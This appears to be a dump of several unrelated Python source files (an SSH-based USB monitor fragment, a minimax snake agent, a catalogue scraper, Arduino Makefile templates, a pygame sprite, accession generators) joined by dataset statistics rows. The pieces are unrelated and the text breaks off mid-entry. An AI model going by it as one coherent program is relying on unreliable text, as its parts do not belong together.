async def _cancel(self):
""" Cancel the USBTOP processing - coroutine """
if not self._sw_config.dev_perf:
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.EnableRequired}')
if not self.isRunning():
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.AforeCancel}')
self._event.set()
self._thread.join()
if not self.isRunning():
self._ssh.kill(self._pid)
return self._log.setWarning(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelSuccess}')
return self._log.setError(f'{self._lang.LogSeparator} {self._ip_addr} : {self._lang.CancelError}')
def run(self):
""" Run the USBTOP processing - calling coroutine """
self._manager.exec(self._run, self._name_running)
def cancel(self):
""" Cancel the USBTOP processing - calling coroutine """
self._manager.exec(self._cancel, self._name_cancelling)
def isRunning(self):
""" Check if the USBTOP processing is running """
return self._thread.is_alive()
| 36.339552 | 118 | 0.618133 | 9,411 | 0.966321 | 0 | 0 | 0 | 0 | 1,399 | 0.143649 | 2,409 | 0.247356 |
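# --- Illustrative usage sketch (not part of the original file; added for
# clarity). Assumes a `base` main-window object as used throughout the module.
#
# usbtop = USBTop(base, '192.168.1.10')
# usbtop.run()       # queues the coroutine that spawns the SSH-backed reader thread
# ...
# usbtop.cancel()    # sets the stop event, joins the thread and kills the remote PID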
c7a3f3c709f3111aed4b0e26101a434835f55c66 | 3,959 | py | Python | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| 1 | 2022-01-09T13:59:34.000Z | 2022-01-09T13:59:34.000Z | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| null | null | null | agent/minimax/submission.py | youkeyao/SJTU-CS410-Snakes-3V3-Group06 | 180ab3714686cdd879454cf103affc6bb03b7fcd | [
"MIT"
]
| null | null | null | DEPTH = 3
# Action
class Action:
top = [1, 0, 0, 0]
bottom = [0, 1, 0, 0]
left = [0, 0, 1, 0]
right = [0, 0, 0, 1]
actlist = [(-1, 0), (1, 0), (0, -1), (0, 1)]
mapAct = {
actlist[0]: top,
actlist[1]: bottom,
actlist[2]: left,
actlist[3]: right
}
def go(state, action, board_height, board_width):
if action == (-1, 0):
return ((state[0]+board_height-1) % board_height, state[1])
elif action == (1, 0):
return ((state[0]+1) % board_height, state[1])
elif action == (0, 1):
return (state[0], (state[1]+1) % board_width)
elif action == (0, -1):
return (state[0], (state[1]+board_width-1) % board_width)
class GameState:
obs = {}
is_end = False
def __init__(self, observation):
self.obs = {
1: observation[1].copy(),
2: observation[2].copy(),
3: observation[3].copy(),
4: observation[4].copy(),
5: observation[5].copy(),
6: observation[6].copy(),
7: observation[7].copy(),
'board_width': observation['board_width'],
'board_height': observation['board_height'],
}
def generateSuccessor(self, index, action):
successor = GameState(self.obs)
index += 2
head = tuple(successor.obs[index][0])
tar = list(Action.go(head, action, self.obs['board_height'], self.obs['board_width']))
for i in range(1, 8):
for cor in successor.obs[i]:
if cor == tar:
successor.is_end = True
if i == 1:
successor.obs[index].append(successor.obs[index][-1])
else:
successor.obs[index].clear()
successor.obs[index].insert(0, tar)
successor.obs[index].pop()
return successor
def evaluationFunction(self):
ans = 0
for i in range(2, 8):
if i < 5:
ans += len(self.obs[i])
else:
ans -= len(self.obs[i])
return ans
class MinimaxAgent:
def __init__(self, obs):
self.obs = obs
def value(self, gameState, index, depth, a, b):
index %= 6
if index == 0:
return self.maxValue(gameState, index, depth + 1, a, b)[0]
elif index < 3:
return self.maxValue(gameState, index, depth, a, b)[0]
else:
return self.minValue(gameState, index, depth, a, b)[0]
def maxValue(self, gameState, index, depth, a, b):
if gameState.is_end or depth >= DEPTH:
return [gameState.evaluationFunction(), None]
v = -10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value > v:
v = value
ac = action
if v >= b:
return [v, ac]
a = max(a, v)
return [v, ac]
def minValue(self, gameState, index, depth, a, b):
if gameState.is_end:
return [gameState.evaluationFunction(), None]
v = 10000
ac = Action.actlist[0]
for action in Action.actlist:
next = gameState.generateSuccessor(index, action)
value = self.value(next, index+1, depth, a, b)
if value < v:
v = value
ac = action
if v <= a:
return [v, ac]
b = min(b, v)
return [v, ac]
def get_action(self, index):
return self.maxValue(GameState(self.obs), index-2, 0, -10000, 10000)[1]
def my_controller(observation, action_space, is_act_continuous=False):
ac = Action.mapAct[MinimaxAgent(observation).get_action(observation['controlled_snake_index'])]
return [ac] | 32.186992 | 99 | 0.51023 | 3,747 | 0.946451 | 0 | 0 | 0 | 0 | 0 | 0 | 113 | 0.028543 |
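# --- Illustrative usage sketch (not part of the original file; added for
# clarity). The observation below is hand-built and its coordinates/sizes are
# invented; key 1 holds beans, keys 2-7 hold the six snakes (head first).
#
# observation = {
#     1: [[0, 0]],
#     2: [[1, 1]], 3: [[2, 2]], 4: [[3, 3]],
#     5: [[4, 4]], 6: [[5, 5]], 7: [[6, 6]],
#     'board_width': 20, 'board_height': 10,
#     'controlled_snake_index': 2,
# }
# print(my_controller(observation, action_space=None))  # e.g. [[1, 0, 0, 0]]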
c7a4ae3d4e412782ea4851134b89f174c5ee6fd3 | 224 | py | Python | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | public_html/python/Empty_Python_Page.py | Asher-Simcha/help | 23c52c136a885d76aa0e2e024cbf1587091f41a7 | [
"BSD-3-Clause"
]
| null | null | null | #!/usr/bin/python
# Title:
# Author:
# Additional Authors:
# Filename:
# Description:
# Version:
# Date:
# Last Modified:
# Location_of_the_Video:
# Meta_data_for_YouTube:
# Web_Site_For_Video:
# Start Your Code Here
#EOF
| 12.444444 | 24 | 0.71875 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 207 | 0.924107 |
c7a9038c8840f231377e3ea552d065f35efee699 | 289 | py | Python | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| null | null | null | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| 33 | 2021-07-11T22:55:42.000Z | 2022-01-07T23:23:43.000Z | Python/first_flask_project/utilities/file_reader.py | maxxxxxdlp/code_share | 4f9375bf4bdf6048b54b22bd1fa0d3ad010de7ef | [
"MIT"
]
| null | null | null | def read_csv(root, file_name, keys):
with open('{root}private_static/csv/{file_name}.csv'.format(root=root, file_name=file_name)) as file:
data = file.read()
lines = data.split("\n")
return [dict(zip(keys, line.split(','))) for i, line in enumerate(lines) if i != 0]
| 36.125 | 105 | 0.650519 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 49 | 0.16955 |
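# --- Illustrative usage sketch (not part of the original file; added for
# clarity). Assuming private_static/csv/users.csv holds a header row followed
# by rows like "alice,42":
#
# rows = read_csv('./', 'users', ('name', 'age'))
# # -> [{'name': 'alice', 'age': '42'}, ...]   (row 0, the header, is skipped)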
c7a95d54d497e531abccb6e65c1f8ff7b1fbb2e5 | 7,202 | py | Python | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| null | null | null | semester3/oop/lab3/parser/client/MasterService/client.py | no1sebomb/University-Labs | 1da5e7486f0b8a6119c077945aba8c89cdfc2e50 | [
"WTFPL"
]
| 1 | 2020-11-01T23:54:52.000Z | 2020-11-01T23:54:52.000Z | # coding=utf-8
from parser.client import *
from parser.client.ResponseItem import *
with (Path(__file__).resolve().parent / "config.json").open("rt") as siteConfigFile:
SITE_CONFIG = json.load(siteConfigFile)
class MasterService(Client):
class Link:
main = "https://steering.com.ua/"
login = "https://steering.com.ua/login"
search = "https://steering.com.ua/catalog?oe={}"
name = "masterservice"
def __init__(self):
super().__init__()
self.username = SITE_CONFIG["username"]
self.password = SITE_CONFIG["password"]
start_time = time()
self.connected, self.logged = self.sign_in()
self.login_time = "%.3f s" % (time() - start_time)
def get_info(self, article, brand):
if self.connected and self.logged:
search_request = self.session.get(self.Link.search.format(article))
if search_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
html_tree = html.fromstring(search_request.text)
items = html_tree.xpath('//table[@class="vi-table vi-responsive"]/tr')
if not items:
return self.response_brand(1, "Артикул не знайдено")
for item in items:
brand_expr = './/td[@data-label=""]/a[@rel="nofollow"]/text()'
try:
item_brand = self.clear(item.xpath(brand_expr)[0])
except IndexError:
try:
item_brand = self.clear(item.xpath('.//td[@data-label=""]/text()')[1])
except IndexError:
item_brand = ""
if self.compare(brand, item_brand):
break
else:
return self.response_brand(1, "Бренд не знайдено")
item_link = item.xpath('.//td/div/a/@href')[0]
item_info_request = self.session.get(item_link)
if item_info_request.status_code != 200:
return self.response_brand(2, "Помилка з'єднання")
item_info_tree = html.fromstring(item_info_request.text)
item_info = item_info_tree.xpath('//table[@class="vi-item-table"]//td/text()')
item = ResponseItem(
article=self.clear(item_info[1]),
brand=item_brand,
name="".join(item_info_tree.xpath('//h1[@class="vi-item-name"]/span/text()')[:-1]),
desc=self.clear(item_info[9])
)
try:
item_price = self.clear(item_info_tree.xpath('//span[@class="value"]/span/text()')[0]).replace(" ", "")
except IndexError:
item_price = "0"
item["price"] = "%.2f UAH" % float(item_price)
try:
item_stocks = item_info_tree.xpath('//td[@class="product-nalichie-table"]/table/tr/td/text()')[1:]
except IndexError:
pass
else:
name = None
for number, value in enumerate(item_stocks):
if number % 2:
item["stocks"].append(
{"name": name,
"quantity": self.clear(value),
"term": None}
)
else:
name = self.clear(value)
try:
image_link = self.Link.main[:-1] + item_info_tree.xpath('//div[@class="fotorama"]/img/@src')[0]
except IndexError:
pass
else:
item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
car_using = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//ul[@class="prim-car"]/li')
for car in car_using:
car_name = self.clear(car.xpath('./span/text()')[0])
car_models = car.xpath('./ul/li')
for car_model in car_models:
model_name = self.clear(car_model.xpath('./span/text()')[0])
model_vars = car_model.xpath('./ul/li/text()')
for model_var in model_vars:
try:
item["using"][car_name].append(model_name + " " + self.clear(model_var))
except KeyError:
item["using"][car_name] = [model_name + " " + self.clear(model_var)]
oe = item_info_tree.xpath('//div[@class="row vi-prim-auto"]//div[@class="car-oe"]//dd[@class="content"]')[0]
oe_codes = oe.xpath("./a/text()")
for oe_code in oe_codes:
try:
item["cross"][""].append(self.clear(oe_code))
except KeyError:
item["cross"][""] = [self.clear(oe_code)]
analogs_table = item_info_tree.xpath('//table[@class="products-list vi-table vi-responsive"]')[0]
analogs = analogs_table.xpath('.//tr[@class="even" or @class="odd"]')
for analog in analogs:
analogs_name_list = analog.xpath('.//a[@class="name"]/span/text()')
try:
analog_brand = self.clear(analog.xpath('.//div[@class="vendor"]/span[@class="value"]/text()')[0])
except IndexError:
analog_brand = ""
analog_item = ResponseItem(
article=self.clear(analogs_name_list[-1]),
brand=analog_brand,
name=self.clear("".join(analogs_name_list[:-1]))
)
analog_stocks = analog.xpath('.//td[@class="storage"]//td[not(contains(@class, "title_sklad"))]/text()')
stock_name = ""
for number, stock in enumerate(analog_stocks[1:]):
if number % 2:
analog_item["stocks"].append(
{"name": stock_name,
"quantity": self.clear(stock),
"term": None}
)
else:
stock_name = self.clear(stock).replace(":", "")
image_link = self.Link.main[:-1] + analog.xpath('.//td[@data-label="Фото"]//img/@src')[0]
analog_item["image"] = self.get_image(image_link, image_id=image_link.split("/")[-1].split(".")[0])
item.set_analog(analog_item)
return self.response_brand(0, "OK", item)
elif self.connected:
return self.response_brand(3, "Помилка авторизації")
else:
return self.response_brand(2, "Помилка з'єднання")
def sign_in(self):
main_page_request = self.session.get(self.Link.main)
if main_page_request.status_code != 200:
return 0, 0
login_request = self.session.post(self.Link.login, data={"login": self.username, "password": self.password},
headers={"Content-Type": "application/x-www-form-urlencoded"})
if login_request.status_code == 200:
return 1, 1
else:
return 1, 0
| 43.648485 | 120 | 0.509303 | 7,082 | 0.970004 | 0 | 0 | 0 | 0 | 0 | 0 | 1,474 | 0.20189 |
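# --- Illustrative usage sketch (not part of the original file; added for
# clarity). Credentials come from the config.json loaded at import time; the
# article and brand values below are placeholders.
#
# service = MasterService()
# if service.connected and service.logged:
#     response = service.get_info('SOME-ARTICLE', 'SOME-BRAND')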
c7a995a9727073409d096c9586ccf8c67b8e8dc3 | 7,320 | py | Python | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| null | null | null | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| 3 | 2015-01-09T20:31:22.000Z | 2015-01-09T20:31:22.000Z | sketchduino/template.py | rodrigopmatias/sketchduino | 567023d69cd21bf1f573d2a26fc855183abdef7e | [
"Apache-2.0"
]
| null | null | null | # -*- coding: utf-8 -*-
'''
Copyright 2012 Rodrigo Pinheiro Matias <[email protected]>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
templates = {
'static_link': '''
\t@$(AR) rcs %(lib)s %(obj)s
\t@echo " [\033[33m\033[1mAR\033[0m] - \033[37m\033[1m%(obj)s\033[0m to \033[37m\033[1m%(lib)s\033[0m"''',
'c_obj_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'asm_obj_ruler': '''%(obj)s: %(source)s
\t@$(AS) $(ASFLAGS) -o %(obj)s %(source)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mAS\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'c_asm_ruler': '''%(obj)s: %(source)s
\t@$(CC) $(CFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCC\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_obj_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'cxx_asm_ruler': '''%(obj)s: %(source)s
\t@$(CXX) $(CXXFLAGS) $(INCLUDE) -c %(source)s -S -o %(obj)s 1>> compile.log 2>> compile.err
\t@echo " [\033[33m\033[1mCXX\033[0m] - \033[37m\033[1m%(source)s\033[0m"''',
'avr-main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <avr/sleep.h>
int main(void) {
for(;;)
sleep_mode();
return 0;
}''',
'main.cc': '''/**
* Generated with sketch %(version)s
**/
#include <Arduino.h>
/**
* Setup of the firmware
**/
void setup() {
}
/**
* Schedule events for firmware program
**/
void loop() {
delay(250);
}''',
'Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Defines of Arduino
ARDUINO_HOME=%(sdk_home)s
ARDUINO_CORE=$(ARDUINO_HOME)/hardware/arduino/cores
ARDUINO_VARIANT=$(ARDUINO_HOME)/hardware/arduino/variants/%(variant)s
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I$(ARDUINO_CORE)/arduino -I$(ARDUINO_VARIANT) -I$(ARDUINO_CORE) -I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
ARDUINO=%(sdk_version)s
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -MMD -DARDUINO=$(ARDUINO) \\
-fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
OBJ=%(obj_dep)s
CORE_OBJ=%(core_obj_dep)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
CORE_LIB=binary/core.a
LIB_DEPS=%(lib_deps)s
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-C --mcu=$(MCU)
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(CORE_LIB) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(CORE_LIB) $(LIB_DEPS) -o $(AOUT)
$(CORE_LIB): $(CORE_OBJ)%(core_ruler)s
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
%(core_asm_rulers)s
%(core_obj_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\trm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
''',
'avr-Makefile': '''##########################################
# Makefile generated with sketch %(version)s
##########################################
# Define toolchain
CC=%(cc)s
CXX=%(cxx)s
AS=%(asm)s
LD=%(ld)s
AR=%(ar)s
OBJCOPY=%(objcopy)s
SIZE=%(size)s
AVRDUDE=%(avrdude)s
PROGRAMER=%(programer)s
LIB=
INCLUDE=-I lib/
#Define of MCU
MCU=%(mcu)s
CLOCK=%(clock_hz)sUL
# Define compiler flags
_CFLAGS=-Os -Wall -fno-exceptions -ffunction-sections -fdata-sections -mmcu=$(MCU) \\
-DF_CPU=$(CLOCK) -fpermissive -lm -Wl,-u,vfprintf -lprintf_min
CFLAGS=$(_CFLAGS) -std=c99
CXXFLAGS=$(_CFLAGS) -std=c++98
ASFLAGS=-mmcu $(MCU)
# Define compiler rulers
ASM=%(asm_dep)s
OBJ=%(obj_dep)s
LIB_DEPS=%(lib_deps)s
AOUT=binary/%(project_name)s-%(mcu)s.elf
HEX=binary/%(project_name)s-%(mcu)s.hex
EPP=binary/%(project_name)s-%(mcu)s.epp
LD_FLAGS=-Os -Wl,--gc-sections -mmcu=$(MCU) -lm
AVRDUDE_OPTIONS = -p$(MCU) -c$(PROGRAMER) %(pgrextra)s -Uflash:w:$(HEX):i
SIZE_OPTS=-A
CONFIG_EXISTS=$(shell [ -e "Makefile.config" ] && echo 1 || echo 0)
ifeq ($(CONFIG_EXISTS), 1)
include Makefile.config
endif
all: $(HEX) $(EPP)
rebuild: clean all
deploy: $(HEX)
\t$(AVRDUDE) $(AVRDUDE_OPTIONS)
$(HEX): $(EPP)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mFirmware\033[0m"
\t@$(OBJCOPY) -O ihex -R .eeprom $(AOUT) $(HEX)
$(EPP): $(AOUT)
\t@echo " [\033[33m\033[1mOBJCOPY\033[0m] - \033[37m\033[1mMemory of EEPROM\033[0m"
\t@$(OBJCOPY) -O ihex -j .eeprom --set-section-flags=.eeprom=alloc,load --no-change-warnings --change-section-lma .eeprom=0 $(AOUT) $(EPP)
size: $(AOUT)
\t@$(SIZE) $(SIZE_OPTS) $(AOUT)
$(AOUT): clear-compiler $(OBJ) $(LIB_DEPS)
\t@echo " [\033[33m\033[1mLD\033[0m] - \033[37m\033[1m$(AOUT)\033[0m"
\t@$(CXX) $(LD_FLAGS) $(LIB) $(OBJ) $(LIB_DEPS) -o $(AOUT)
%(asm_rulers)s
%(obj_rulers)s
%(libs_rulers)s
clear-compiler:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear compiler logs"
\t@rm -f compile.*
clean-tmp:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
clean-bin:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
clean:
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear temporary files"
\t@rm -f tmp/*
\t@echo " [\033[33m\033[1mRM\033[0m] - Clear binary files"
\t@rm -f binary/*
'''
}
| 27.518797 | 138 | 0.630464 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7,222 | 0.986612 |
c7a9d270039cb319b1e7bd45460f8d2badbcbfe0 | 1,562 | py | Python | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| 2 | 2016-04-13T02:52:46.000Z | 2017-11-20T22:41:36.000Z | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| null | null | null | Tic-Tac-Pi/gameObjects/TextObject.py | mstubinis/Tic-Tac-Pi | b96db58332be4975f4a5b18b6dd45a0eac859528 | [
"MIT"
]
| 3 | 2016-04-14T02:29:32.000Z | 2020-04-27T06:08:07.000Z | import pygame
from pygame.locals import *
import resourceManager
class TextObject(pygame.sprite.Sprite):
def __init__(self,pos,fontSize,fontcolor,textstring):
pygame.sprite.Sprite.__init__(self) #call Sprite initializer
self.position = pos
self.message = textstring
self.color = fontcolor
self.font = pygame.font.Font(None,fontSize)
self.text = self.font.render(self.message, 1,fontcolor)
self.rect = pygame.Rect((0,0),self.font.size(self.message))
self.rect.midtop = pos
def is_clicked(self,events):
if self.is_mouse_over() == True:
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 1:
return True
return False
def is_mouse_over(self):
mousePos = pygame.mouse.get_pos()
if mousePos[0] < self.rect.x:
return False
if mousePos[0] > self.rect.x + self.rect.w:
return False
if mousePos[1] < self.rect.y:
return False
if mousePos[1] > self.rect.y + self.rect.h:
return False
return True
def update_message(self,message):
self.message = message
self.text = self.font.render(message, 1,self.color)
self.rect.w = self.font.size(message)[0]
self.rect.h = self.font.size(message)[1]
self.rect.midtop = self.position
def update(self):
pass
def draw(self,screen):
screen.blit(self.text, self.rect)
| 31.24 | 68 | 0.596031 | 1,495 | 0.957106 | 0 | 0 | 0 | 0 | 0 | 0 | 24 | 0.015365 |
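# --- Illustrative usage sketch (not part of the original file; added for
# clarity). Window size, colours and text are arbitrary.
#
# pygame.init()
# screen = pygame.display.set_mode((320, 240))
# label = TextObject((160, 20), 24, (255, 255, 255), 'Play')
# running = True
# while running:
#     events = pygame.event.get()
#     running = not any(e.type == pygame.QUIT for e in events)
#     if label.is_clicked(events):
#         label.update_message('Clicked!')
#     screen.fill((0, 0, 0))
#     label.draw(screen)
#     pygame.display.flip()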
c7aa2635f7e1d5416d843dacc6078257816ee795 | 2,268 | py | Python | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 4 | 2018-01-04T22:31:08.000Z | 2021-07-15T17:39:16.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 7 | 2017-10-31T23:47:47.000Z | 2022-01-10T00:12:42.000Z | src/encoded/server_defaults.py | beta-cell-network/beta-cell-nw | 093b078fdb7932ebfcbc0715aeeb2261eda3ee52 | [
"MIT"
]
| 10 | 2017-09-14T00:57:07.000Z | 2021-07-27T23:41:14.000Z | from datetime import datetime
from jsonschema_serialize_fork import NO_DEFAULT
from pyramid.security import effective_principals
from pyramid.threadlocal import get_current_request
from string import (
digits,
ascii_uppercase,
)
import random
import uuid
from snovault.schema_utils import server_default
ACCESSION_FACTORY = __name__ + ':accession_factory'
def includeme(config):
from pyramid.path import DottedNameResolver
accession_factory = config.registry.settings.get('accession_factory')
if accession_factory:
factory = DottedNameResolver().resolve(accession_factory)
else:
factory = enc_accession
config.registry[ACCESSION_FACTORY] = factory
@server_default
def userid(instance, subschema):
request = get_current_request()
principals = effective_principals(request)
for principal in principals:
if principal.startswith('userid.'):
return principal[7:]
return NO_DEFAULT
@server_default
def now(instance, subschema):
# from jsonschema_serialize_fork date-time format requires a timezone
return datetime.utcnow().isoformat() + '+00:00'
@server_default
def uuid4(instance, subschema):
return str(uuid.uuid4())
@server_default
def accession(instance, subschema):
if 'external_accession' in instance:
return NO_DEFAULT
request = get_current_request()
factory = request.registry[ACCESSION_FACTORY]
# With 17 576 000 options
ATTEMPTS = 10
for attempt in range(ATTEMPTS):
new_accession = factory(subschema['accessionType'])
if new_accession in request.root:
continue
return new_accession
raise AssertionError("Free accession not found in %d attempts" % ATTEMPTS)
ENC_ACCESSION_FORMAT = (digits, digits, digits, ascii_uppercase, ascii_uppercase, ascii_uppercase)
def enc_accession(accession_type):
random_part = ''.join(random.choice(s) for s in ENC_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
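# Sanity check on the "17 576 000 options" comment in accession() above:
# ENC_ACCESSION_FORMAT has three digit slots and three uppercase slots, so the
# space per accession type is 10**3 * 26**3 = 1000 * 17576 = 17,576,000 codes.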
TEST_ACCESSION_FORMAT = (digits, ) * 6
def test_accession(accession_type):
""" Test accessions are generated on test.encodedcc.org
"""
random_part = ''.join(random.choice(s) for s in TEST_ACCESSION_FORMAT)
return 'D' + accession_type + random_part
| 28 | 98 | 0.740741 | 0 | 0 | 0 | 0 | 1,029 | 0.453704 | 0 | 0 | 299 | 0.131834 |
c7aa99e86ce9b9941bb3c2dee52be602130563cd | 200 | py | Python | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| 1 | 2021-10-11T20:20:50.000Z | 2021-10-11T20:20:50.000Z | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| null | null | null | app/__init__.py | geirowew/SapAPI | dda0d839722d28c7a30d58c8b3d5076a503fd837 | [
"MIT"
]
| 2 | 2021-01-22T10:52:04.000Z | 2021-10-06T10:28:07.000Z | from flask import Flask
#from config import Config
import config
app = Flask(__name__)
#app.config.from_object(Config)
app.config.from_object(config)
#from app import routes
from app import gettoken | 20 | 31 | 0.81 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 80 | 0.4 |
c7ae90de0db880bd9c87e6ef499b2ab425e89a1b | 19 | py | Python | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | todo/task/__init__.py | BenMcLean981/flask-todo | 9827f4993c7d4af0c42ed2a891f2eb56227f1644 | [
"MIT"
]
| null | null | null | """Todo module."""
| 9.5 | 18 | 0.526316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 18 | 0.947368 |
c7aedff29cfbc578d32b6b83c7dce7618a9b1e46 | 680 | py | Python | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
| 1 | 2021-05-11T14:15:11.000Z | 2021-05-11T14:15:11.000Z | src/pvt_model/pvt_system/pipe.py | BenWinchester/PVTModel | 6bf3976b06f406f632e0a9e525cd8b05359da239 | [
"MIT"
]
